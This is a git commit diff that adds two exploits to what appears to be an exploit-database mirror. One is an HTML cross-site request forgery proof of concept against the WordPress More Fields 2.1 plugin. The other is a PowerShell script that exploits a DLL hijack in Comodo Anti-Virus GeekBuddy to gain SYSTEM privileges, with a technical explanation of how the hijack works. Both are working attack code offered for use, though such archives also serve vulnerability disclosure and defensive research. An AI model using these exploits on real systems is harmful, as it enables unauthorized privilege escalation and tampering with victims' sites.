DB: 2016-03-01
2 new exploits
This commit is contained in:
parent
62a54b60c6
commit
a4526e0949
3 changed files with 328 additions and 0 deletions
|
@ -35745,3 +35745,5 @@ id,file,description,date,author,platform,type,port
|
|||
39504,platforms/android/dos/39504.c,"Qualcomm Adreno GPU MSM Driver perfcounter Query Heap Overflow",2016-02-26,"Google Security Research",android,dos,0
|
||||
39505,platforms/linux/dos/39505.c,"Linux io_submit L2TP sendmsg - Integer Overflow",2016-02-26,"Google Security Research",linux,dos,0
|
||||
39506,platforms/php/webapps/39506.txt,"JSN PowerAdmin Joomla! Extension 2.3.0 - Multiple Vulnerabilities",2016-02-26,"RatioSec Research",php,webapps,80
|
||||
39507,platforms/php/webapps/39507.txt,"WordPress More Fields <= 2.1 Plugin - CSRF Vulnerability",2016-02-29,"Aatif Shahdad",php,webapps,80
|
||||
39508,platforms/windows/local/39508.ps1,"Comodo Anti-Virus SHFolder.DLL - Local Privilege Elevation Exploit",2016-02-29,Laughing_Mantis,windows,local,0
|
||||
|
|
Can't render this file because it is too large.
|
65
platforms/php/webapps/39507.txt
Executable file
65
platforms/php/webapps/39507.txt
Executable file
|
@ -0,0 +1,65 @@
|
|||
# Exploit Title: Wordpress More Fields Plugin 2.1 Cross-Site Request Forgery
|
||||
# Date: 28-02-2016
|
||||
# Software Link: https://wordpress.org/support/plugin/more-fields
|
||||
# Exploit Author: Aatif Shahdad
|
||||
# Twitter: https://twitter.com/61617469665f736
|
||||
# Contact: aatif_shahdad@icloud.com
|
||||
# Category: webapps
|
||||
|
||||
1. Description
|
||||
|
||||
The plugin More Fields has CSRF token validation disabled for all functions, including the add box and delete box options. As a result, a specially crafted attacker page could cause
|
||||
a logged-in administrator to add and delete any number of extra fields in any number of additional boxes on the Write/Edit page in the Admin.
|
||||
|
||||
2. Proof of Concept
|
||||
|
||||
Login as admin to the wp-admin area at http://example.com/wp-admin. Open the following Proof-Of-Concept with the browser that you used to log in.
|
||||
|
||||
POC to add box named ‘test’:
|
||||
|
||||
--POC begins--
|
||||
Add Boxes:
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<form action="https://example.com/wpadmin/optionsgeneral.php?page=more-
|
||||
fields&action=save&keys=_plugin%2C57UPhPh&navigation=boxes" method="POST">
|
||||
<input type="hidden" name="label" value="test" />
|
||||
<input type="hidden" name="post_types[]" value="press" />
|
||||
<input type="hidden" name="position" value="left" />
|
||||
<input type="hidden" name="fields" value="" />
|
||||
<input type="hidden" name="ancestor_key" value="" />
|
||||
<input type="hidden" name="originating_keys" value="_plugin,57UPhPh" />
|
||||
<input type="hidden" name="action" value="save" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
|
||||
Remove Boxes needs the following simple GET request (Assuming the name of the Box we want to delete is ‘test’):
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<form action="https://example.com/wpadmin/optionsgeneral.php">
|
||||
<input type="hidden" name="page" value="more-fields" />
|
||||
<input type="hidden" name="action" value="delete" />
|
||||
<input type="hidden" name="action_keys" value="_plugin,test" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
|
||||
Note: I have removed the CSRF tokens from the requests as they are redundant and not validated.
|
||||
|
||||
--End of POC--
|
||||
|
||||
|
||||
3. Impact
|
||||
|
||||
The attacker can add/delete any number of extra fields in any number of additional boxes on the Write/Edit page in the Admin.
|
||||
|
||||
4. Solution:
|
||||
|
||||
Add in CSRF token validation to the plugin or switch to a different plugin. The development of the Plugin has ceased so this happens to be the latest version which can’t be upgraded as of now.
|
261
platforms/windows/local/39508.ps1
Executable file
261
platforms/windows/local/39508.ps1
Executable file
|
@ -0,0 +1,261 @@
|
|||
<#
|
||||
|
||||
|
||||
````......````
|
||||
``,;''''''''''''''''';,`
|
||||
.;''''''''''''''''''''''''''',`
|
||||
`:''''''''+';:,.``````.,:;'''''''''':`
|
||||
,;'''''';,.` ``,;'''''';:
|
||||
`:'''''',. `,'''''';.
|
||||
`;+''+':` ,; `,''''';.
|
||||
`;'''';. `` .:;'` `. `;'''''.
|
||||
` :+''';` `,``:+'' ';;'`,''; `` `` :'''';`
|
||||
.'''';` ,';' '':'` ';,'`'',' :''' .''` :'''',
|
||||
`;''''` ;'' :+.` ;';, ';:' ''''`,;:+ '', `;''''`
|
||||
.''''. ;:`, .'.':`'''.:;`;. +;:' '::; ;''' '; .'''',
|
||||
:''';` ` '''',`':'' ..;:`','` '''' ':;;`'`';`':` :; :''';
|
||||
;''+, .;`.'.'' ';.'`';': ,:. ` ` ` `,: .';',,'`;'.`';': .+'''`
|
||||
`''''` ;'; ''.'.,','` ,` ``;`'' .`;'`''+: ;'''`
|
||||
`'''' ., .'' ,'.'' ;;. ```````` `. ``'::'`;; ` :'''.
|
||||
``''': `+,` .':`'',' `,;''''''''''+'':.` ;'.+:;'``': .'''.
|
||||
`''', '', ''`:; `:'''''''''''''''''''''';. `;'`': ''`'` .''',
|
||||
`''', ` `''` `'; .''''''''''''''''''''''''''''';` `.;' ;'.''`.: `''',
|
||||
`''', :''.`'' ` ,;'''''''''''''''''''''''''''''''';. ` `,.'::', ''` .'''.
|
||||
''', '.''`,': ,'''''''''''''''''''''''''''''''''''''', ` .+,'; ''; .'''`
|
||||
''': ''`'' ;. `'''''''''''''''''';:::;';'''''''''''''''''. ;' :': ,,` .'''
|
||||
:''; `''.'` ` :''''''''''''';:::.', `''';`:;'+'''','''''+; `,'; :''' ,'''
|
||||
.''' `` .++; `''''''''''''`. `': '''; `:''' :'''''''. .+ :''.+. :'':
|
||||
`''+ :'': `` ,''''''''''''' `': '''; `: ,'''''''': .`''.'' ` '''`
|
||||
;''. `+.',; ;'''':''''''''; ` ', .'''': ` :''''';'''; `'.',`,', `+''
|
||||
,'': '';,'. ;''''':''''''''`+` ;..`;'+''. '.:''''';'''''```.+' +:'` .'';
|
||||
`''' `;``+',;.` ;''''':''''''''.'; `;'', '` '' ;''''','''''` ;,+.+. ;''.
|
||||
;'+. :'': ;': ;'''''':''''':',''. `'';.+' '` ,'; .'''';''''''` `+.':` `'''
|
||||
`'': .+`;''` ` ;'''''':''''''.::''. .''. :: `'';`,'''':''''''` :+'. ,'',
|
||||
'''` :''.:'' :''''''':'''''; :'''' .'', `.,; :+'`''': ;''',''''''' ,` '''
|
||||
.'': `'';`` ,''''''':;''''':`''';', ,''+` ,+':' +'''''''`,'''''''''''; .+` .'':
|
||||
''' `''. :', `''''''':`'''''+.;';.:::::::,,''';`'': . .'''''''; ''''.''''''', ` ;'': '''
|
||||
.'', ','';`. '''''''; :'''''' `,;'''''''''.``` . ''''';:,`:;''+`'''',,'''''''` :'';` `+':
|
||||
'''` ''.,'; ;''''''; ''''',`,'''''''''''''.....,,,.`''''''''';;,,;.''''; :''''''' '''. ;''
|
||||
`'': .'';:; `'''''''` .+'', ,''''''''''''; '''''''++`''''':..:'''' `''''' ;'''''', ., `` .'',
|
||||
` :'' :''` ''''''+` ;''``;'''''''''''''':``,,.`````,'''''. ';.;'''` `'''''''` .++. '';
|
||||
+'' ,'''''': ;+`,'''''''''''''''''+''';;;;'''''''+` :;+,`''. `.''''''; .+'''` :'+`
|
||||
,''. ': +'''''; ,,;''''''''''''''''''''''''''''''''''. `.::,` `';.', ;''''''` :'': `. `'';
|
||||
;'' :;.;': ,''''''. `''''';;;,`.:'''''''''''''''''''''''''.;''''''':`;;;, `''''''; `.; .;'+` ;''
|
||||
'': ` ;';';' ''''''; ''';;''''''',`.'',` .:;;''''''''''.,'''''''''''.;;. ,'''''' `;''''. .''`
|
||||
.''. .';`;' .''''''. :+;;''''''''''': ;' ::::...;''+'':,'''';..``;''';. ''''''; `:''.`': `'':
|
||||
:'' ` ,'` ;''''''. :;'''''''''''''';`;, `,''';` .:;;;'''': ,'''''' .,''', '''
|
||||
;'; ''';,` `''''''''''` :''''''''''';.:'''`';:` ,''';`;''''''''''', ''''''. ;';,` :''`
|
||||
`'', .;,'''; ,'''''''''' ;'''''''''':` :'''`::` ``'''',+''''''''''''+` ;'''''; .``.:;` `''.
|
||||
.''` `+;'`;` '''''''''';.'''''''',` ''';` :''';'''';::;'''''';; ` `''''''` ;'';;; `+':
|
||||
:'' ..;'' `''''''''''`'''''''', .'''` `+''';''. ,'''''''''''''''''''''''''''''''''''''':`
|
||||
;'' :. `` .'''''''''';'''''''' ;''; ;''':::` :'''''''''''''''''''''''''''''''''''''''',
|
||||
;': '''':` :'''''''''''''''''',` .''' ''''. `+'''''''''''''''''''''''''''''''''''''''''
|
||||
'', :,;'': ;''''''''''''''''''` ;''... :''''` :''''''''''''''''''''''''''''''''''''''''''`
|
||||
`''. `+'':,` ''''''''''''''''''; ,'';.+` . ,;''' `'''''''''''''''''''''''''''''''''''''''''';
|
||||
.''. `.,;'; '''''''''';''''''', ''',+. `` .' .''' ''''''''+'''''''''''''''''''''''''''''''''',
|
||||
.'+` ;''''' `` '''''''` `;''''.'++','`+.''' ''''''; `;+''''''
|
||||
,'' ''''';; ,'''';'''';'``.''' :''''''` .'''''':
|
||||
:'+ '''''': .'''';'''';'` .''' ,''''''` ,''''';
|
||||
:'' ,''''', ''''''` .'''';'''';', .'''` .''''''` ''''''
|
||||
;'' `''''''; :''''', '''''' .'''';'''';':,''''. .''''''` ''''''
|
||||
;'' `';''''' :''''', :''''; :''''''''';''.''''' `''''''` ;'''''
|
||||
;'' :''''', ,''''' `+''''''''':''.'''''` ,'''''; ''''''
|
||||
:'+ ,''''', `'''''. ,'''''''''':''::''''; ;''''': `''''''
|
||||
:'' ```. ,''''': ''''': `''''''''''',''+`'''''. `''''''. :''''''
|
||||
,''` `''''''' .'''''; `''''': '''''''''''';''',,''''', ''''''' ,'''''',
|
||||
.''` `''':,.; `'''''' `'''''': '''''''''''''';'''`'''''':. `,''''''', .''''''''
|
||||
`''` `,;;;''` '''''' `'','''';,` `,''''''''''''''',''':.''''''''''''''''''':` ;'''''''''''''''''''''''''''''',
|
||||
'', `+';;, '''''' `''`,'''''''''''''''''''''''''''':''''.:''''''''''''''''',+ '''''''''''''''''''''''''''''';
|
||||
'': ` `,. ;'''''. `''' .''''''''''''''''''''''''''''.''''`;''''''''''''''':;; `''''''''''''''''''''''''''';';
|
||||
;'; ,''''; :''''': `''''``'''''''''''''''''''''''''''`:''''`;''''''''''''';,', ,'''''''''''''''''''''''''''';
|
||||
;'' ';;,.. .'''''' `''';; :''''''''''''''''';'''''''. '''''`;'''''''''''';+'` ;'''''''''''''''''''''''''';.
|
||||
:'' `,:;''' ''''''` `'''`';` `;'''''';,''''''';''''''', .'''''..''''''''''''+: '''''''';''''''''';''''';,`
|
||||
.''. .''',` ;''''': ` ''':;''. ````` :+'''''',;''''''', '''''';..;''''''''''` `'''''' `,'': `+':
|
||||
'': ` .;. ,'''''+ .'';,'''''''';:''''''''','''''''': ;'''''''''.`,''''''' ;'''''; ,'', .''.
|
||||
''; :+.++` `''''''. +'''`'''''''''''''''''''.''''''''', .''';;'':,,'''''''', ''''''. ':''', :''`
|
||||
:'' ,';:.'. ;'''''' ''''.:''''''''''''''''';;'''''''''''.'''. `:;'''''':'': :'''''' ';,.:' '''
|
||||
.''. .;:''' .''''''` ,'''':`''''''''''''''''':''''''''''';''''.`;'''''''''.'''', '''''': ,'''', `'':
|
||||
''; ;';, ;` '''''';.+''''' ''''''''''''''''':''''''''''': :'':'''''''''',;''''': :'''';' ,. .;: ,''`
|
||||
;'' `;', `,'''''''''''''.,'''''''''''''';','''';:.`` `,.;'''''''''''.+''''''.''''''; ,'+'. '''
|
||||
.''. '''';` ''''';''''''';`'''''''''''''':.'';:,;'''':` ,:`:''''''''','',`:''':''''''` '.:''' `'':
|
||||
''' :'': `:. ,'''';;'''''''`;'''''''''''',:';`:'',,``.:'. `':`+''''''';:'',':';.''''''; `'''..' :''
|
||||
:''` `,. ;:++` ''''';,'''''';`''''''''''';;',.''....,.. ,';:.'.`'''''''.'''','';+'''''' ;. ,+''` '';
|
||||
`'': `'',`;: `'''''',''''''.:''''''''''`+.,';:''''''';.:''':'`,''''''`'''':''''''''', :':;` ,' ,'',
|
||||
;''` `+.''+` ` :'''''','''''' '''''''''' `.'''''''''''''::'''', +'''':,''''`;'''''''' +.''+; '''
|
||||
`'': ;'';` ` ''''''':''''';`'''''''', '''''''''''''''.,''''`''''',:''''`,'''''''` '''.:'; .'':
|
||||
''+` ,` ,+: `'''''','''''':`'''''''` :'''''''''''''; ;'''`+''''`;'''':+''''''.` ` :'':;, '''
|
||||
.'': ;';''. .'''''';'''''',`'''''+ ''''''''''''''` .,'';.''''' '''''''''''': +'``;'; .'',
|
||||
''+` :''; ,'` :''''','''''''.,''''' ,'''''''''''''' :''''';''''','''';''''''; ,.''. .`` '''
|
||||
`';; `+. ;'':' :''''':'''''''.:'''; ;''''''''''''': `'''''''''''.'''''.'''''' :';`''; :''.
|
||||
:'',` `'':.''` ;'''';;:''''''`'''; '''''''''''''': .'''''''''''.''',;'''''' ` :''.'''` `'''
|
||||
''' ;'.:''` ;''''';:''''':''';.'';''''''''''': ,'''''''''':;'':+''''''` .''``'+',: '''`
|
||||
.';; `;;'; ` :''''':'''''';'''`'';''''''''''': ,''''''''''`''';'''''; .,''` :` ,'':
|
||||
;'', `', `'. ,''''';''''';'''''':''''''''''': .''''''''',`+';,''''; ``.'''; ``'''
|
||||
'''` `'';: ` .'''':'''''`'''''';;''''''''''; `'''';'''',.`''+,'', ,'`:'''''` '''`
|
||||
.''' ;'.'' `;''''''''.''''''':'''';:,''';. ,''';''''',;'''',` `;''''''';. ;'',
|
||||
,''; ''.;', ,';''''';,''''''`+,` .;:;''',,'';'''+.;''''',```:+,''''''''''.:'';
|
||||
;''; ''';', '. `,''''''.'''''' `.:;'+''''+''';.,.''':,''''''` ``'''''''''''''',''
|
||||
''': .,,': :': +''''''',''';.:'+,.` `.:''':`''''''''''; `'':'''''''''''''',`
|
||||
''': ` .'' `'`;'''''''..,.:+,` ``.,.` ,'''`;'''''''+.';'.:'''':;'''''+:.'`
|
||||
''': ;:`+'` ,:..,''''''; .+: `:'+''''';` ;'; .''''': `:';:+''';`''''''. .':
|
||||
`'''; ; ;'. .';'`;'''',;'. .+''''''''''` ;;'+:'''; .+'''''''';''''''.;,'';
|
||||
`'''' ,'; :'`'`;'''':+` `'''''''''''': ;'';'''`;''''''''''''''''',.''';
|
||||
`'''' ` ` `':. ';''.+. `''''''''''''; `'''''::'''.'''',`'''''': :';;''
|
||||
''''. :;,'`:'.';', '''''''''''': ,'''','''..''': '''';;:,''. `''
|
||||
:''': `.+'' '''',' :''''''''''+. ''''''':`'''' .''';:;`.'.:' ';
|
||||
,''''` `,` ',;:'. `;;;,``'''::::;''; :';, ,'''''' ;'''` +'''.''+'.:'+`':
|
||||
`'''': ` ;'':' '''''+;.; `` ,:`''''', `'''''`,'''' :'''.''''..''','.
|
||||
:''''. .,': :'''''''.`;'''';` .''''''` '''':`+'''``''',;'''``''';:'.
|
||||
`'''''` `.'` ''''''';`'''''''': ,'''''; ;'''`''''; ''';:'''. ;''',''
|
||||
,'''''` `.'` '''''''.'''''''''', +'''''` ,'';.''''`''''`+''' ,''''`.:
|
||||
:''''', .' '''''''.'''';:.,'''`''''''. .''''''':.''',;'''``;,',' '.
|
||||
`:+'''';..; '''''':,''':'''.:''.'''''': `'`''''' ''''`''': ' ::.:`+
|
||||
`,''''':' ''''''::''+`''',;''.;''''', `'.'''';`'''.;'''`:.,+`'`,:
|
||||
.;+':' '''''';.''''';`,'''.''''''` `'.''''.,'''`'''.`;`+;`' +
|
||||
.:+` '''''''`''''''+'''+.'''''; .' ;''' ;''.;,'' ' ''.:``:
|
||||
'. :'''''':.+'''''''',;''''', ;: ;''; '''.'.,;,,:'' '`'
|
||||
;; `'''''''``;'''''',`,''''' `'` ''',.''',.:;`' ''.,.`;
|
||||
.+ ''''''' ` `.,,.`'; '''; :; `''+`;'';;: :.;`',`; ;`
|
||||
+: `'''''``';;;;;'''', `` `+. `''' '''::;;:;`;'`;..,
|
||||
,' ``.. `+''''''''''+` :' `'';`''':. ,.',''.; '
|
||||
`+' :'''''''''''', `+.` '',.''',. :,''''+ ;
|
||||
.', ;''''''''''''. ': ''.,''':` ;.''''.,.
|
||||
:'. :''''''''''', ;'` ''.:''',':;.''':.:
|
||||
''. ,:''''',` ;+` :'.:'''' ':`''; ;
|
||||
`'', ''. ::,''''``; :, '
|
||||
;+;` .'+` ``'':'`,; '``
|
||||
,'';. `.'';` :';'.,; '.
|
||||
`,''';:::::;'''. ``+;' +`
|
||||
`,:''''';,` ,,;
|
||||
|
||||
|
||||
|
||||
SHFolder.DLL Local Privilege Elevation Exploit for Comodo Anti-Virus GeekBuddy Component by @Laughing_Mantis (Greg Linares)
|
||||
|
||||
Since it took 146 days to fix a DLL Hijack issue I decided to drop this PoC:
|
||||
|
||||
###Technical Geeky Stuff###
|
||||
|
||||
GeekBuddy stores several helper applications within the C:\ProgramData\Comodo\lps4\temp folder.
|
||||
These binaries are individual components of the Comodo Security Suite and are executed whenever
|
||||
their related function is performed, updated, or uninstalled.
|
||||
|
||||
The directory listing is as follows:
|
||||
10/06/2015 12:08 AM <DIR> .
|
||||
10/06/2015 12:08 AM <DIR> ..
|
||||
10/02/2015 10:43 PM 27 download.cfg
|
||||
10/02/2015 10:47 PM 637,864 setup_clps_application_vulnerability_monitor_release-4.10.307677.9.exe
|
||||
10/02/2015 10:44 PM 2,196,272 setup_clps_autoruns_manager_api_release-4.14.330616.6.exe
|
||||
10/02/2015 10:44 PM 547,088 setup_clps_boot_time_monitor_release-4.12.315371.9.exe
|
||||
10/06/2015 12:07 AM 1,014,024 setup_clps_browser_addons_api_release-4.0.292287.4.exe
|
||||
10/02/2015 10:44 PM 554,240 setup_clps_browser_addons_monitor_release-4.12.315370.6.exe
|
||||
10/06/2015 12:06 AM 950,864 setup_clps_client_transaction_release-4.19.365037.89.exe
|
||||
10/06/2015 12:08 AM 563,896 setup_clps_cross_selling_installer_monitor_release-4.12.318569.13.exe
|
||||
10/02/2015 10:43 PM 768,032 setup_clps_cspm_alert_monitor_release-4.19.360508.5.exe
|
||||
10/06/2015 12:08 AM 581,432 setup_clps_immaturely_closed_sessions_monitor_release-4.21.366534.6.exe
|
||||
10/02/2015 10:47 PM 459,432 setup_clps_memory_monitor_release-4.10.301764.3.exe
|
||||
10/02/2015 10:46 PM 1,152,480 setup_clps_system_cleaner_api_release-4.2.292287.3.exe
|
||||
10/06/2015 12:07 AM 1,989,272 setup_clps_system_cleaner_monitor_release-4.12.317464.8.exe
|
||||
10/06/2015 12:07 AM 648,912 setup_clps_windows_event_monitor_release-4.19.362032.8.exe
|
||||
10/02/2015 10:43 PM 1 survey_version.txt
|
||||
10/06/2015 12:05 AM <DIR> updates
|
||||
|
||||
The C:\ProgramData\Comodo\lps4\temp\ folder has the following permission configuration:
|
||||
|
||||
C:\ProgramData\Comodo\lps4\temp NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
|
||||
BUILTIN\Administrators:(OI)(CI)(ID)F
|
||||
CREATOR OWNER:(OI)(CI)(IO)(ID)F
|
||||
BUILTIN\Users:(OI)(CI)(ID)R
|
||||
BUILTIN\Users:(CI)(ID)(special access:)
|
||||
FILE_WRITE_DATA
|
||||
FILE_APPEND_DATA
|
||||
FILE_WRITE_EA
|
||||
FILE_WRITE_ATTRIBUTES
|
||||
|
||||
Notice how the folder allows Users to have FILE_WRITE_DATA and FILE_WRITE_EA access. This allows
|
||||
non-administrator users the ability to create files in the directory but not delete or modify
|
||||
existing files.
|
||||
|
||||
Comodo's main service engine is controlled by the SYSTEM service Launcher-Service.exe which resides
|
||||
in the C:\Program Files (x86)\Common Files\COMODO\ folder. This service is auto launched by the
|
||||
registry key HKLM\System\CurrentControlSet\Services\CLPSLauncher
|
||||
|
||||
This binary will then launch Unit_Manager.exe in the C:\Program Files\COMODO\GeekBuddy with SYSTEM
|
||||
level privielges. This binary in turn then launches the binary C:\Program Files\COMODO\GeekBuddy\unit.exe
|
||||
to handle each sub process in the C:\ProgramData\Comodo\lps4\temp\ folder.
|
||||
|
||||
During client connections to update servers and Geek Buddy executions the unit.exe binary will
|
||||
launch the binary setup_clps_client_transaction_release-4.19.365037.89.exe. This setup binary has
|
||||
hardcoded DLL loading procedures to look for SHFOLDER.DLL in the current directory which it is
|
||||
executed from.
|
||||
|
||||
.data:00409240 dd offset aShfolder ; "SHFOLDER"
|
||||
.data:00409244 dd offset aShgetfolderpat ; "SHGetFolderPathA"
|
||||
|
||||
During this delay load procedure the exe will load SHFOLDER.DLL from its local directory before
|
||||
looking in the other PATHS variables.
|
||||
|
||||
By planting a malicious SHFOLDER.DLL in the C:\ProgramData\Comodo\lps4\temp\ and triggering an
|
||||
update or client connection to secure servers (which occurs automatically at user login) a user can
|
||||
elevate their privileges to SYSTEM and compromise the system fully.
|
||||
|
||||
|
||||
######### GREETZ ######################################################################################
|
||||
1st off all my new homies in the Vectra Networks Research Team - you guys are seriously legit mad #respect to everyone here. #Humbled
|
||||
|
||||
@taviso - keep killing it and thanks for being an inspiration
|
||||
@bill_billbil - sup girl chicken rico n chill
|
||||
@tacticalRCE - Its no 100 mile rides but will miss all the good times. C-ya around mang.
|
||||
@hellNBak_ - drop tehm greetz like its 2003
|
||||
@hacksforpancakes - make plans for other NullCon in 2016 ;)
|
||||
@jduck - we gonna juke some more toyotas next time you come visit
|
||||
@hdmoore - good luck with your ventures good sir
|
||||
@jsoo - dont give up good sir - you're doing awesome
|
||||
@thegrugq - when i grow up i hope im half as wise as you good sir
|
||||
@daveaitel - Triangular Anus logos are the best
|
||||
@da_667 - AYYYYYYYYYYYYYY LMAO
|
||||
@bonovoxly - Clever Girls Wear Pink on Wednesdays
|
||||
Derek Soeder - Respect to you brother, keep on being awesome
|
||||
Benny 29A - next time im in CZ lets get beers, im buying
|
||||
Yuji Ukai - #RESPECT to everything you have ever done and will ever do. #Ninja
|
||||
Sizzop - for fixing my greetz
|
||||
|
||||
#########################################################################################################
|
||||
|
||||
|
||||
#>
|
||||
|
||||
Param
|
||||
(
|
||||
|
||||
[Parameter(ValueFromPipelineByPropertyName = $true)]
|
||||
[string]$DLL = ""
|
||||
)
|
||||
|
||||
|
||||
|
||||
|
||||
if (!(Test-Path $DLL))
|
||||
{
|
||||
throw "Fatal Error: The specified file: $DLL does not exist."
|
||||
}
|
||||
|
||||
Copy-Item -Path $DLL -Destination "C:\ProgramData\Comodo\lps4\temp\SHFolder.dll" -Force
|
||||
|
||||
Write-Host "Copying $DLL to the Comodo AV GeekBuddy's insecure temp folder as SHFolder.dll" -ForegroundColor Red
|
||||
|
||||
|
||||
[void][System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
|
||||
|
||||
$objNotifyIcon = New-Object System.Windows.Forms.NotifyIcon
|
||||
|
||||
|
||||
$MyPath = Get-Process -id $pid | Select-Object -ExpandProperty Path
|
||||
$objNotifyIcon.Icon = [System.Drawing.Icon]::ExtractAssociatedIcon($MyPath)
|
||||
$objNotifyIcon.BalloonTipIcon = "Info"
|
||||
$objNotifyIcon.BalloonTipText = "Hijacked SHFolder.DLL with $DLL.
|
||||
Now manually update Comodo Anti-Virus using the GUI or Reboot the system to gain SYSTEM Level Privileges"
|
||||
$objNotifyIcon.BalloonTipTitle = "@Laughing_Mantis"
|
||||
|
||||
$objNotifyIcon.Visible = $True
|
||||
$objNotifyIcon.ShowBalloonTip(8000)
|
Loading…
Add table
Reference in a new issue